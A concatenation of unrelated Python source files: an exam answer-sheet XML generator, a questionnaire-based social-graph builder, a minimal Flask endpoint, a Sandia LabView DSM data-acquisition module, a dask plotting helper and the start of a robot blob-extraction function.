    # A text run with an optional explicit font size
    # (None means "inherit from the paragraph style").
    temp_name = 'run_text'

    def __init__(self, text, font_size=24):
        super().__init__()
        self.text = text
        self.font_size = font_size

    def to_xml(self):
        # transfer() escapes the text before it is embedded in the template.
        kwargs = {'text': self.transfer(self.text),
                  'font_size': self.font_size}
        return self._to_xml(**kwargs)
class RunImageXmlObj(XmlObj):
    # An image run; `item` is a dict of template variables
    # (contains at least a 'url' key — see ParagraphXmlObj.runs).
    temp_name = 'run_image'

    def __init__(self, item):
        super().__init__()
        self.item = item

    def to_xml(self):
        return self._to_xml(**self.item)
class BlockParent(object):
    # Factory base class: BlockParent(mode, ...) instantiates whichever
    # subclass lists `mode` in its MODES; falls back to BlockParent itself.
    MODES = []

    @classmethod
    def subclass(cls):
        # Collect all (transitive) subclasses.
        cs = []
        for c in cls.__subclasses__():
            cs.append(c)
            if hasattr(c, 'subclass'):
                cs.extend(c.subclass())
        return cs

    def __new__(cls, *args, **kwargs):
        # Dispatch on the question mode (first positional argument).
        mode = args[0]
        cs = cls.subclass()
        new_cls = cls
        for c in cs:
            if mode in c.MODES:
                new_cls = c
                break
        return super().__new__(new_cls)

    def __init__(self, mode, questions, answer_mode):
        self.mode = mode
        self.answer_mode = answer_mode
        self.questions = questions

    def _get_alone_answers(self):
        # Compact ('alone') answer sheet; defaults to the detailed variant.
        return self._get_alone_detail_answers()

    def _get_alone_detail_answers(self):
        return []

    def get_answers(self):
        # Render the answer paragraphs to XML strings.
        if self.answer_mode == 'alone':
            ps = self._get_alone_answers()
        else:
            ps = self._get_alone_detail_answers()
        return [p.to_xml() for p in ps]
class Block(BlockParent):
    # Generic question block for modes 2-5 (free-form answers).
    MODES = [2, 3, 4, 5, ]

    def _get_alone_answers(self):
        return self._get_alone_detail_answers()

    def _get_alone_detail_answers(self):
        # One paragraph per rich-answer line; the first line of each question
        # is prefixed with the question number.
        ss_paragraphs = []
        for q_item in self.questions:
            if q_item['multi_answer_rich']:
                q_item['multi_answer_rich'][0].insert(
                    0, '%s、' % q_item['this_question_no'])
            for ar in q_item['multi_answer_rich']:
                ss_paragraphs.append(ParagraphXmlObj(ar))
        return ss_paragraphs
class SingleChoiceBlock(Block):
    # Single-choice questions (mode 1).
    MODES = [1, ]

    @staticmethod
    def get_right_option(question):
        return question['right_option']

    def _get_alone_answers(self):
        # Compact answer key: chunks of 5 rendered as "<first>-<last> ABCDE",
        # with 4 chunks (20 answers) per paragraph.
        ss_paragraphs = [[]]
        ss_item = []
        i = 0
        for item in self.questions:
            item['right_option'] = self.get_right_option(item)
            ss_item.append(item)
            i += 1
            if i % 5 == 0:
                rp = '%s-%s %s ' % (
                    ss_item[0]['this_question_no'],
                    ss_item[-1]['this_question_no'],
                    ''.join([x['right_option'] for x in ss_item]))
                ss_paragraphs[-1].append(rp)
                if i % 20 == 0:
                    ss_paragraphs.append([])
                ss_item = []
        if ss_item:
            # Trailing partial chunk.
            rp = '%s-%s %s' % (ss_item[0]['this_question_no'],
                               ss_item[-1]['this_question_no'],
                               ''.join([x['right_option'] for x in ss_item]))
            ss_paragraphs[-1].append(rp)
        return [ParagraphXmlObj(p) for p in ss_paragraphs]

    def _get_alone_detail_answers(self):
        # Per-question answer paragraph followed by its analysis paragraph.
        ss_paragraphs = []
        for item in self.questions:
            right_option = self.get_right_option(item)
            pa = '%s.%s' % (item['this_question_no'], right_option)
            ss_paragraphs.append(pa)
            details = ['解析:']
            details.extend(item['answer_rich'])
            ss_paragraphs.append(details)
        return [ParagraphXmlObj(p) for p in ss_paragraphs]
class MultipleChoiceBlock(SingleChoiceBlock):
    # Multiple-choice questions (mode 6).
    MODES = [6, ]

    def _get_alone_answers(self):
        # One "<no> <answers>" entry per question, 5 entries per paragraph.
        # NOTE(review): reads item['right_option'] directly without calling
        # get_right_option() — confirm the key is always pre-populated.
        ss_paragraphs = [[]]
        i = 0
        for item in self.questions:
            p = '%s %s ' % (item['this_question_no'], item['right_option'])
            ss_paragraphs[-1].append(p)
            i += 1
            if i % 5 == 0:
                ss_paragraphs.append([])
        return [ParagraphXmlObj(p) for p in ss_paragraphs]
class JudgeBlock(SingleChoiceBlock):
    # True/false questions (mode 7); the first option's score encodes
    # whether "true" is the correct answer.
    MODES = [7, ]

    @staticmethod
    def get_right_option(question):
        if question['options'][0]['score'] > 0:
            return '√'
        return '×'
if __name__ == '__main__':
px = ParagraphXmlObj()
print(BlockParent(6, [], 'alone'))
|
986,937 | 6d6a4911ea6a13ca49507e8a338136e98f003731 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# EXPLANATION:
# This file reads in the people.csv and the files from the /data folder, and
# uses these data to create the nodes-and-edges.js.
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# LIBRARIES
# -----------------------------------------------------------------------------
import numpy as np
from itertools import product
# -----------------------------------------------------------------------------
# CLASSES
# -----------------------------------------------------------------------------
class Node():
    """
    This class is used to represent nodes of the graph, i.e. people.
    """
    def __init__(self, id, name, major, group):
        # Basic properties
        self.id = id
        self.name = name
        self.major = major
        self.group = group
        # Complex properties that need to be calculated
        self.knows = 0
        self.known_by = 1
        # Additional properties from the questionaire; filled in later from
        # data-answers/<id>.csv, where the literal "'?'" marks a missing answer.
        self.age = 0
        self.academies = 0
        self.waylength = 0
        self.hiking = 0
        self.lake = 0
        self.choir = 0
        self.games = 0
        self.drinks = 0
        self.sleep = 0
        self.number = 0
        self.hotness = 0
        self.hookups = 0
        self.description = ''
# -----------------------------------------------------------------------------
# FUNCTIONS
# -----------------------------------------------------------------------------
def LightColor(group):
    """Return the light display color (CSS rgb string) for an AG group."""
    palette = {1: 'rgb(230, 91, 119)',
               3: 'rgb(146, 181, 242)',
               4: 'rgb(238, 165, 77)',
               5: 'rgb(100, 174, 100)',
               6: 'rgb(255, 227, 77)',
               7: 'rgb(129, 77, 168)'}
    return palette[group]
def DarkColor(group):
    """Return the dark display color (CSS rgb string) for an AG group."""
    palette = {1: 'rgb(220, 20, 60)',
               3: 'rgb(100, 149, 237)',
               4: 'rgb(230, 126, 0)',
               5: 'rgb(34, 139, 34)',
               6: 'rgb(255, 215, 0)',
               7: 'rgb(75, 0, 130)'}
    return palette[group]
def isEven(number):
    """Return True if `number` is even.

    Bug fix: the previous implementation returned the negated test
    (`not number % 2 == 0`), i.e. it reported odd numbers as even.
    """
    return number % 2 == 0
def create_adjacency_matrix(n_people):
    """
    This function loops over all files in /data and creates the adjacency
    matrix from it.
    """
    adjacency_array = []
    for i in range(n_people):
        try:
            # Column 1 of ./data/<i>.csv holds person i's "knows" row.
            row = np.loadtxt('./data/{}.csv'.format(i), usecols=[1], delimiter=',')
        except IOError:
            # Missing file: person i knows nobody.
            row = np.array(n_people*[0])
        adjacency_array.append(row)
    return np.matrix(adjacency_array)
def apply_warshall_algorithm(w):
    """Return the all-pairs shortest-path distance matrix for weight matrix w.

    A zero entry in w means "no direct edge" and is treated as an infinite
    distance before the Floyd-Warshall relaxation.
    """
    size = len(w)
    dist = np.array([[np.inf if w[row, col] == 0 else w[row, col]
                      for col in range(size)]
                     for row in range(size)])
    for mid in range(size):
        for row, col in product(range(size), range(size)):
            dist[row, col] = min(dist[row, col], dist[row, mid] + dist[mid, col])
    return dist
def get_bar_sum():
    """Sums up all contributions to the bar"""
    # Reads the module-level list_of_nodes; Python 2 print statement.
    barsumme = 0
    for node in list_of_nodes:
        if node.drinks == "'?'":
            # Skip people who did not answer the questionnaire.
            continue
        barsumme += int(node.drinks)
    print barsumme
def scrabble_score(word):
    """Calculates the scrabble score of a word.

    Letters are scored case-insensitively; characters with no entry in the
    table (umlauts, punctuation, ...) contribute 0. Words longer than 15
    characters score 0 outright.

    Bug fix: membership was previously tested on the raw letter while the
    lookup used letter.lower(), so uppercase letters were silently skipped.
    """
    score = {'a': 1, 'b': 3, 'c': 4, 'd': 1, 'e': 1, 'f': 4,
             'g': 2, 'h': 2, 'i': 1, 'j': 6, 'k': 4, 'l': 2,
             'm': 3, 'n': 1, 'o': 2, 'p': 4, 'q': 10, 'r': 1,
             's': 1, 't': 1, 'u': 1, 'v': 6, 'w': 3, 'x': 8,
             'y': 10, 'z': 3}
    if len(word) > 15:
        return 0
    return sum(score[letter.lower()] for letter in word
               if letter.lower() in score)
def replace_umlauts(string):
    """Replaces the German umlauts in a string"""
    replacements = (('ß', 'ss'), ('ä', 'ae'), ('ö', 'oe'), ('ü', 'ue'))
    result = string.lower()
    for umlaut, ascii_form in replacements:
        result = result.replace(umlaut, ascii_form)
    return result
def calculate_all_scrabble_scores():
    """Calculates the scrabble score for all words"""
    # Reads the module-level list_of_nodes; Python 2 print statement.
    for node in list_of_nodes:
        word = replace_umlauts(node.description)
        if word == "'?'":
            # No one-word description given — skip.
            continue
        print word, scrabble_score(word)
def minDistance(pos):
    """Return the smallest squared distance from `pos` to any already-placed
    point in the module-level `positions`; a sentinel > 20000 if none exist."""
    x, y = pos
    squared_dists = [(x - px) ** 2 + (y - py) ** 2 for px, py in positions]
    if not squared_dists:
        return 20001
    return np.min(squared_dists)
def xy_from_group(group):
    # Place a node near its group's sector on a circle of radius 1500,
    # rejecting random draws that land within sqrt(20000) of existing nodes.
    # Side effect: appends the accepted position to the module-level `positions`.
    def pol2cart(rho, phi):
        x = rho * np.cos(phi)
        y = rho * np.sin(phi)
        return [x, y]
    # Map the group label to one of six 60-degree sectors.
    number = {'1':0, '3':1, '4':2, '5':3, '6':4, '7':5}[group]
    x_, y_ = pol2cart(1500, np.pi/3*number)
    x = x_ + np.random.normal(0, 250)
    y = y_ + np.random.normal(0, 250)
    while minDistance([x, y]) < 20000:
        x = x_ + np.random.normal(0, 250)
        y = y_ + np.random.normal(0, 250)
    positions.append([x, y])
    return (x, y)
def get_node_by_id(list_of_nodes_, id):
    """Return the node whose `id` attribute matches, or None if absent."""
    matches = (node for node in list_of_nodes_ if node.id == id)
    return next(matches, None)
def average_known_people():
    """Prints the average number of people known by one person"""
    # Reads the module-level adjacency_matrix and n_people; Python 2 prints.
    print 'Knows', np.mean([sum(list(np.ravel(adjacency_matrix[i])))
                            for i in range(n_people)])
    print 'Is known', np.mean([sum(adjacency_matrix[:,i])
                               for i in range(n_people)])
def create_nodes_and_edges(list_of_nodes_, adjacency_matrix_):
    """
    This function takes the list of nodes and the list of edges and creates
    the JSON file from them.
    """
    # Random numbers for the labels (anonymized node labels)
    random_numbers = np.arange(len(list_of_nodes_))
    np.random.shuffle(random_numbers)
    print random_numbers
    # Update the nodes: Every node gets told how many other nodes know it
    # NOTE(review): the loop below reads the module-level adjacency_matrix,
    # not the adjacency_matrix_ parameter — confirm this aliasing is intended.
    for node in sorted(list_of_nodes_, key=lambda x: x.id):
        node.knows = int(sum(np.ravel(adjacency_matrix[node.id])))
        node.known_by = int(np.ravel(sum(adjacency_matrix[:,node.id])))
    # Update the nodes: Every node gets its questionaire answers
    # (empty answers and '-1' are replaced by the literal "'?'")
    for node in sorted(list_of_nodes_, key=lambda x: x.id):
        try:
            with open('./data-answers/{}.csv'.format(node.id), 'r') as f:
                answers = f.readlines()
            node.age = answers[0].strip() if (answers[0].strip() and answers[0].strip() != '-1') else "'?'"
            node.academies = answers[1].strip() if (answers[1].strip() and answers[1].strip() != '-1') else "'?'"
            node.waylength = answers[2].strip() if (answers[2].strip() and answers[2].strip() != '-1') else "'?'"
            node.hiking = answers[3].strip() if (answers[3].strip() and answers[3].strip() != '-1') else "'?'"
            node.lake = answers[4].strip() if (answers[4].strip() and answers[4].strip() != '-1') else "'?'"
            node.choir = answers[5].strip() if (answers[5].strip() and answers[5].strip() != '-1') else "'?'"
            node.games = answers[6].strip() if (answers[6].strip() and answers[6].strip() != '-1') else "'?'"
            node.drinks = answers[7].strip() if (answers[7].strip() and answers[7].strip() != '-1') else "'?'"
            node.sleep = answers[8].strip() if (answers[8].strip() and answers[8].strip() != '-1') else "'?'"
            node.number = answers[9].strip() if (answers[9].strip() and answers[9].strip() != '-1') else "'?'"
            node.hotness = answers[10].strip() if (answers[10].strip() and answers[10].strip()!= '-1') else "'?'"
            node.hookups = answers[11].strip() if (answers[11].strip() and answers[11].strip()!= '-1') else "'?'"
            node.description = answers[12].strip() if (answers[12].strip() and answers[12].strip()!= '-1') else "'?'"
        except IOError:
            # No questionnaire file for this person: mark everything unknown.
            node.age = "'?'"
            node.academies = "'?'"
            node.waylength = "'?'"
            node.hiking = "'?'"
            node.lake = "'?'"
            node.choir = "'?'"
            node.games = "'?'"
            node.drinks = "'?'"
            node.sleep = "'?'"
            node.number = "'?'"
            node.hotness = "'?'"
            node.hookups = "'?'"
            node.description = "?"
    with open('nodes-and-edges.js', 'w+') as f:
        # Write the code for the Nodes to the file
        # This is just the preamble
        f.write('// The nodes for the graph \n')
        f.write('var nodes = [ \n')
        # And these are the actual data
        for node in sorted(list_of_nodes_, key=lambda x: x.id):
            pos = xy_from_group(node.group)
            f.write('\t{{ id: {id}, '
                    'label: "{random_number}", '
                    'title: "<small style=\'font-family: Roboto Slab;\'>'
                    # 'Name: {label} <br>'
                    # 'Fach: {major} <br>'
                    'AG: {group} <br>'
                    '---<br>'
                    'Kennt {knows} Leute <br>'
                    'Wird gekannt von {known_by} Leuten <br>'
                    '---<br>'
                    'Alter: {age} <br>'
                    'Anzahl Sommerakademien: {academies} <br>'
                    'Anfahrtsdauer: {waylength} <br>'
                    'Wander-Tage: {hiking} <br>'
                    'See-Tage: {lake} <br>'
                    'Chor-Tage: {choir} <br>'
                    'Spieleabende: {games} <br>'
                    'Beitrag zur Barkasse: {drinks} <br>'
                    'Schlaf pro Nacht: {sleep} <br>'
                    'Lieblingszahl: {number} <br>'
                    'Eigene Attraktivität: {hotness} <br>'
                    'Hookup-Schätzung: {hookups} <br>'
                    'Neubeuern in einem Wort: {description}'
                    '</small>", '
                    'value: {value}, '
                    'group: {group}, '
                    'knows: {knows}, '
                    'known_by: {known_by}, '
                    'x: {x}, '
                    'y: {y}, '
                    'color: {{ border: "{border}", '
                    'background: "{background}", '
                    'highlight: {{ border: "{border}", '
                    'background: "{background}" }} }}, '
                    'original_color: {{ border: "{border}", '
                    'background: "{background}", '
                    'highlight: {{ border: "{border}", '
                    'background: "{background}" }} }}, '
                    'age: {age}, '
                    'academies: {academies}, '
                    'waylength: {waylength}, '
                    'hiking: {hiking}, '
                    'lake: {lake}, '
                    'choir: {choir}, '
                    'games: {games}, '
                    'drinks: {drinks}, '
                    'sleep: {sleep}, '
                    'number: {number}, '
                    'hotness: {hotness}, '
                    'hookups: {hookups}, '
                    'description: "{description}" }},\n'
                    .format(id=node.id,
                            random_number=random_numbers[node.id],
                            label=node.name,
                            major=node.major,
                            group=node.group,
                            x=pos[0],
                            y=pos[1],
                            knows=node.knows,
                            known_by=node.known_by,
                            value=node.known_by,
                            border=DarkColor(int(node.group)),
                            background=LightColor(int(node.group)),
                            age=node.age,
                            academies=node.academies,
                            waylength=node.waylength,
                            hiking=node.hiking,
                            lake=node.lake,
                            choir=node.choir,
                            games=node.games,
                            drinks=node.drinks,
                            sleep=node.sleep,
                            number=node.number,
                            hotness=node.hotness,
                            hookups=node.hookups,
                            description=node.description))
        # Close the Node array properly
        f.write(']; \n\n\n')
        # Create the edges...
        f.write('var edges = [\n')
        # Now loop over the adjacency matrix to calculate the edges
        n_people = len(adjacency_matrix_)
        id = 0
        for row in range(n_people):
            for col in range(row):
                # CASE 1: Both people said they know each other.
                # We draw an undirected edge between them
                if adjacency_matrix_[row, col] and adjacency_matrix_[col, row]:
                    startnode = get_node_by_id(list_of_nodes_, row)
                    color = DarkColor(int(startnode.group))
                    f.write('\t{{ id: {}, from: {}, to: {}, '
                            'color: "{}", original_color: "{}"}},\n'
                            .format(id, row, col, color, color))
                    id += 1
                # CASE 2: Person in row knows person in col, but not vice versa
                if adjacency_matrix_[row, col] and not adjacency_matrix_[col, row]:
                    startnode = get_node_by_id(list_of_nodes_, row)
                    color = DarkColor(int(startnode.group))
                    f.write('\t{{ id: {}, from: {}, to: {}, arrows: "to", '
                            'color: "{}", original_color: "{}"}},\n'
                            .format(id, row, col, color, color))
                    id += 1
                # CASE 3: Person in col knows person in row, but not vice versa
                if not adjacency_matrix_[row, col] and adjacency_matrix_[col, row]:
                    startnode = get_node_by_id(list_of_nodes_, col)
                    color = DarkColor(int(startnode.group))
                    f.write('\t{{ id: {}, from: {}, to: {}, arrows: "to", '
                            'color: "{}", original_color: "{}"}},\n'
                            .format(id, col, row, color, color))
                    id += 1
        # Close the Edges array properly
        f.write('];')
    print 'Created nodes-and-edges.js!'
# -----------------------------------------------------------------------------
# MAIN PROGRAM
# -----------------------------------------------------------------------------
# This is where we keep track of all Node positions (filled by xy_from_group)
positions = []
# This is where we keep track of all nodes
list_of_nodes = []
# Read in the people.csv and initialize the Nodes from these data
# (one "name, major, group" row per person; row index becomes the node id)
with open('people.csv', 'r') as f:
    for index, line in enumerate(f.readlines()):
        name, major, group = map(lambda x: x.strip(), line.split(','))
        new_node = Node(index, name, major, group)
        list_of_nodes.append(new_node)
# The number of people in the graph
n_people = len(list_of_nodes)
# Get the adjacency matrix from the files in /data/
adjacency_matrix = create_adjacency_matrix(n_people)
# Create the nodes-and-edges.js
create_nodes_and_edges(list_of_nodes, adjacency_matrix)
# Apply the Warshall-algorithm to the adjacency matrix
##np.set_printoptions(threshold='nan')
##print set(np.ravel(apply_warshall_algorithm(adjacency_matrix)))
|
986,938 | 612b3a83ac203237a5386800f2127473e557a71f | from flask import Flask
app = Flask(__name__)
@app.route('/', methods=['GET'])
def home():
    # Landing page for the demo GET API.
    return "<h1>GET API </h1><p> Create a get api using python flask</p>"

# NOTE(review): runs the development server at import time; usually guarded
# by `if __name__ == '__main__':` — confirm intended.
app.run()
|
986,939 | 40728aeb26d115866a7a18d5bd944e4b01aadcaf | import os
import das
sandia_info = {
'name': os.path.splitext(os.path.basename(__file__))[0],
'mode': 'Sandia DSM'
}
def das_info():
    # Module discovery hook: identifies this DAS implementation to svpelab.
    return sandia_info
def params(info, group_name=None):
    # Register this DAS mode's parameters with the test-script UI.
    # gname/pname build fully-qualified parameter names under group_name.
    gname = lambda name: group_name + '.' + name
    pname = lambda name: group_name + '.' + GROUP_NAME + '.' + name
    mode = sandia_info['mode']
    info.param_add_value(gname('mode'), mode)
    info.param_group(gname(GROUP_NAME), label='%s Parameters' % mode,
                     active=gname('mode'), active_value=mode, glob=True)
    info.param(pname('dsm_method'), label='Data Acquisition Method', default='Sandia LabView DSM',
               values=['Sandia LabView DSM', 'TCP Stream for Sandia LabView DSM'],
               desc='Each lab will have different data acquisition methods. Sandia passes the data from the DAQ '
                    'to python by writing the values locally or collecting them over the local TCP network.')
    info.param(pname('das_comp'), label='Data Acquisition Computer', default='10 Node',
               values=['10 Node', 'DAS 3', 'DAS 5', 'DAS 8'],
               active=pname('dsm_method'), active_value=['Sandia LabView DSM'],
               desc='Selection of the data acquisition system (if there are multiple options).')
    info.param(pname('node'), label='Node at Sandia - Used to ID DAQ channel', default=10, active=pname('das_comp'),
               active_value=['10 Node'],
               desc='Selection of the EUT which will be used for the test (Sandia specific).')
GROUP_NAME = 'sandia'

# Fixed local paths used to exchange channel lists, data samples and
# trigger files with the LabView DSM.
PATH = 'C:\\python_dsm\\'
POINTS_FILE = 'C:\\python_dsm\\channels.txt'
DATA_FILE = 'C:\\python_dsm\\data.txt'
TRIGGER_FILE = 'C:\\python_dsm\\trigger.txt'
WFM_TRIGGER_FILE = 'C:\\python_dsm\\waveform trigger.txt'
# Per-node channel maps: LabView DSM channel name -> normalized point name.
# NOTE(review): nodes 1-5 map 'ac1_freq' and nodes 6-10 map 'ac6_freq' to
# 'ac_freq' — presumably one shared frequency channel per DAQ chassis;
# confirm against the LabView channel configuration.
# Data channels for Node 1
dsm_points_1 = {
    'time': 'time',
    'dc_voltage_1': 'dc_voltage',
    'dc_current_1': 'dc_current',
    'ac_voltage_1': 'ac_voltage',
    'ac_current_1': 'ac_current',
    'dc1_watts': 'dc_watts',
    'ac1_va': 'ac_va',
    'ac1_watts': 'ac_watts',
    'ac1_vars': 'ac_vars',
    'ac1_freq': 'ac_freq',
    'ac_1_pf': 'ac_pf',
    'pythontrigger': 'trigger',
    'ametek_trigger': 'ametek_trigger'
}

# Data channels for Node 2
dsm_points_2 = {
    'time': 'time',
    'dc_voltage_2': 'dc_voltage',
    'dc_current_2': 'dc_current',
    'ac_voltage_2': 'ac_voltage',
    'ac_current_2': 'ac_current',
    'dc2_watts': 'dc_watts',
    'ac2_va': 'ac_va',
    'ac2_watts': 'ac_watts',
    'ac2_vars': 'ac_vars',
    'ac1_freq': 'ac_freq',
    'ac_2_pf': 'ac_pf',
    'pythontrigger': 'trigger',
    'ametek_trigger': 'ametek_trigger'
}

# Data channels for Node 3
dsm_points_3 = {
    'time': 'time',
    'dc_voltage_3': 'dc_voltage',
    'dc_current_3': 'dc_current',
    'ac_voltage_3': 'ac_voltage',
    'ac_current_3': 'ac_current',
    'dc3_watts': 'dc_watts',
    'ac3_va': 'ac_va',
    'ac3_watts': 'ac_watts',
    'ac3_vars': 'ac_vars',
    'ac1_freq': 'ac_freq',
    'ac_3_pf': 'ac_pf',
    'pythontrigger': 'trigger',
    'ametek_trigger': 'ametek_trigger'
}

# Data channels for Node 4
dsm_points_4 = {
    'time': 'time',
    'dc_voltage_4': 'dc_voltage',
    'dc_current_4': 'dc_current',
    'ac_voltage_4': 'ac_voltage',
    'ac_current_4': 'ac_current',
    'dc4_watts': 'dc_watts',
    'ac4_va': 'ac_va',
    'ac4_watts': 'ac_watts',
    'ac4_vars': 'ac_vars',
    'ac1_freq': 'ac_freq',
    'ac_4_pf': 'ac_pf',
    'pythontrigger': 'trigger',
    'ametek_trigger': 'ametek_trigger'
}

# Data channels for Node 5
dsm_points_5 = {
    'time': 'time',
    'dc_voltage_5': 'dc_voltage',
    'dc_current_5': 'dc_current',
    'ac_voltage_5': 'ac_voltage',
    'ac_current_5': 'ac_current',
    'dc5_watts': 'dc_watts',
    'ac5_va': 'ac_va',
    'ac5_watts': 'ac_watts',
    'ac5_vars': 'ac_vars',
    'ac1_freq': 'ac_freq',
    'ac_5_pf': 'ac_pf',
    'pythontrigger': 'trigger',
    'ametek_trigger': 'ametek_trigger'
}

# Data channels for Node 6
dsm_points_6 = {
    'time': 'time',
    'dc_voltage_6': 'dc_voltage',
    'dc_current_6': 'dc_current',
    'ac_voltage_6': 'ac_voltage',
    'ac_current_6': 'ac_current',
    'dc6_watts': 'dc_watts',
    'ac6_va': 'ac_va',
    'ac6_watts': 'ac_watts',
    'ac6_vars': 'ac_vars',
    'ac6_freq': 'ac_freq',
    'ac_6_pf': 'ac_pf',
    'pythontrigger': 'trigger',
    'ametek_trigger': 'ametek_trigger'
}

# Data channels for Node 7
dsm_points_7 = {
    'time': 'time',
    'dc_voltage_7': 'dc_voltage',
    'dc_current_7': 'dc_current',
    'ac_voltage_7': 'ac_voltage',
    'ac_current_7': 'ac_current',
    'dc7_watts': 'dc_watts',
    'ac7_va': 'ac_va',
    'ac7_watts': 'ac_watts',
    'ac7_vars': 'ac_vars',
    'ac6_freq': 'ac_freq',
    'ac_7_pf': 'ac_pf',
    'pythontrigger': 'trigger',
    'ametek_trigger': 'ametek_trigger'
}

# Data channels for Node 8
dsm_points_8 = {
    'time': 'time',
    'dc_voltage_8': 'dc_voltage',
    'dc_current_8': 'dc_current',
    'ac_voltage_8': 'ac_voltage',
    'ac_current_8': 'ac_current',
    'dc8_watts': 'dc_watts',
    'ac8_va': 'ac_va',
    'ac8_watts': 'ac_watts',
    'ac8_vars': 'ac_vars',
    'ac6_freq': 'ac_freq',
    'ac_8_pf': 'ac_pf',
    'pythontrigger': 'trigger',
    'ametek_trigger': 'ametek_trigger'
}

# Data channels for Node 9
dsm_points_9 = {
    'time': 'time',
    'dc_voltage_9': 'dc_voltage',
    'dc_current_9': 'dc_current',
    'ac_voltage_9': 'ac_voltage',
    'ac_current_9': 'ac_current',
    'dc9_watts': 'dc_watts',
    'ac9_va': 'ac_va',
    'ac9_watts': 'ac_watts',
    'ac9_vars': 'ac_vars',
    'ac6_freq': 'ac_freq',
    'ac_9_pf': 'ac_pf',
    'pythontrigger': 'trigger',
    'ametek_trigger': 'ametek_trigger'
}

# Data channels for Node 10
dsm_points_10 = {
    'time': 'time',
    'dc_voltage_10': 'dc_voltage',
    'dc_current_10': 'dc_current',
    'ac_voltage_10': 'ac_voltage',
    'ac_current_10': 'ac_current',
    'dc10_watts': 'dc_watts',
    'ac10_va': 'ac_va',
    'ac10_watts': 'ac_watts',
    'ac10_vars': 'ac_vars',
    'ac6_freq': 'ac_freq',
    'ac_10_pf': 'ac_pf',
    'pythontrigger': 'trigger',
    'ametek_trigger': 'ametek_trigger'
}

# Lookup from node id (string) to its channel map.
dsm_points_map = {
    '1': dsm_points_1,
    '2': dsm_points_2,
    '3': dsm_points_3,
    '4': dsm_points_4,
    '5': dsm_points_5,
    '6': dsm_points_6,
    '7': dsm_points_7,
    '8': dsm_points_8,
    '9': dsm_points_9,
    '10': dsm_points_10
}
class Data(das.Data):
    # Reads DSM measurement samples from a shared text file, mapping the
    # lab channel names to normalized point names. Python 2 syntax
    # (`except Exception, e`).

    def extract_points(self, points_str):
        # Channel/data files look like '[...][a,b,c]': after joining the
        # bracketed groups, return the first comma-separated group split
        # into a list. Returns None if no group contains a comma.
        x = points_str.replace(' ', '_').replace('][', ' ').strip('[]').split()
        for p in x:
            if p.find(',') != -1:
                return p.split(',')

    def __init__(self, ts, dsm_id=None, data_file=DATA_FILE, points_file=POINTS_FILE, points=None):
        das.Data.__init__(self, ts)
        self._data_file = data_file
        self._points = points
        # Fall back to the node-10 channel map if dsm_id is unknown.
        self._points_map = dsm_points_map.get(str(dsm_id), dsm_points_10)
        self.read_error_count = 0
        self.read_last_error = ''
        if self._points is None:
            self._points = []
            if points_file is not None:
                f = open(points_file)
                channels = f.read()
                f.close()
                self._points = self.extract_points(channels)
        # Pre-create the normalized data points we know how to map.
        for p in self._points:
            point_name = self._points_map.get(p)
            if point_name is not None:
                self[point_name] = None

    def read(self):
        # Parse the latest sample; errors are counted rather than raised so
        # a half-written data file does not abort the test run.
        try:
            f = open(self._data_file)
            data = f.read()
            f.close()
            points = self.extract_points(data)
            if len(points) == len(self._points):
                for i in range(len(self._points)):
                    # get normalized name
                    point_name = self._points_map.get(self._points[i])
                    if point_name is not None:
                        self[point_name] = float(points[i])
        except Exception, e:
            self.read_error_count += 1
            self.read_last_error = str(e)

    def __str__(self):
        '''
        s = 'dsm_data:\n'
        for k, v in dsm_points.iteritems():
            s += ' %s: %s\n' % (v, self[v])
        return s
        '''
        # NOTE(review): the real implementation is commented out above, so
        # __str__ returns None, which breaks str() — confirm intended.
        pass
class Trigger(das.Trigger):
    # File-existence trigger: the LabView DSM watches for the trigger file;
    # creating it asserts the trigger, removing it clears it. Errors are
    # counted rather than raised. Python 2 syntax (`except Exception, e`).
    def __init__(self, ts, filename=TRIGGER_FILE):
        das.Trigger.__init__(self, ts)
        self.filename = filename
        self.on_error_count = 0
        self.on_last_error = ''
        self.off_error_count = 0
        self.off_last_error = ''

    def on(self):
        # Create the (empty) trigger file.
        try:
            f = open(self.filename, 'w')
            # f.write('trigger')
            f.close()
        except Exception, e:
            self.on_error_count += 1
            self.on_last_error = str(e)

    def off(self):
        # Remove the trigger file.
        try:
            os.remove(self.filename)
        except Exception, e:
            self.off_error_count += 1
            self.off_last_error = str(e)
class DAS(das.DAS):
    """
    Template for grid simulator implementations. This class can be used as a base class or
    independent grid simulator classes can be created containing the methods contained in this class.
    """
    def __init__(self, ts, group_name):
        das.DAS.__init__(self, ts, group_name)
        self.ts.log('dsm_method = %s' % self.param_value('dsm_method'))

    def param_value(self, name):
        # Look up a test-script parameter under this DAS's group prefix.
        return self.ts.param_value(self.group_name + '.' + GROUP_NAME + '.' + name)

    def data_init(self):
        # NOTE(review): Data is built without a dsm_id, so it always falls
        # back to the node-10 channel map — confirm intended.
        return Data(self.ts)

    def config(self):
        """
        Perform any configuration for the simulation based on the previously
        provided parameters.
        """
        pass

    def open(self):
        """
        Open the communications resources associated with the grid simulator.
        """
        pass

    def close(self):
        """
        Close any open communications resources associated with the grid
        simulator.
        """
        pass

    def value_capture(self):
        pass

    def waveform_capture(self):
        pass

    def trigger_init(self):
        return Trigger(self.ts)

    def trigger(self, state=None):
        pass
if __name__ == "__main__":
pass
|
986,940 | af4f1b93d4cb18933e9bd340b13c69ab5bfedd35 | # viewer_cluster.py
#Programmer: Tim Tyree
#Date: 3.22.2022
#the idea is to generate a lot of textures, batch_size, quickly on gpu, and then to make one task for each batch_size on a cpu processor that does matplotlib
from ..utils.parallel import eval_routine_daskbag
def eval_viewer_cluster(task_lst, routine_to_png, npartitions, printing=True, **kwargs):
    """Render one .png per task in parallel via a dask bag.

    Example Usage:
    start=time.time()
    retval=eval_viewer_cluster(task_lst=task_lst,routine_to_png=routine_to_png_streaming_tips,npartitions=npartitions,printing=True)
    if printing:
        print(f"the apparent run time for plotting was {(time.time()-start)/60:.1f} minutes")
    """
    if printing:
        batch_size = len(task_lst)
        print(f"generating {batch_size} .png files over {npartitions} cores...")
    # Fan the plotting routine out over npartitions worker processes.
    return eval_routine_daskbag(routine=routine_to_png, task_lst=task_lst,
                                npartitions=npartitions, printing=printing,
                                **kwargs)
|
986,941 | 64520b48a701fab205cf9007ab6bcf4d4cbf25d7 |
import networkx as nx
from math import sqrt, fabs
from sensors.pointsamplecam import PointSampleImage
#@profile
def extract_blobs_closest_points(this_robot, in_image, active_mask):
    """ Extracts blobs from the given image, each represented by the pixel
    closest to the robot.

    Fixes: identity comparison with None (`!= None` -> `is not None`) and
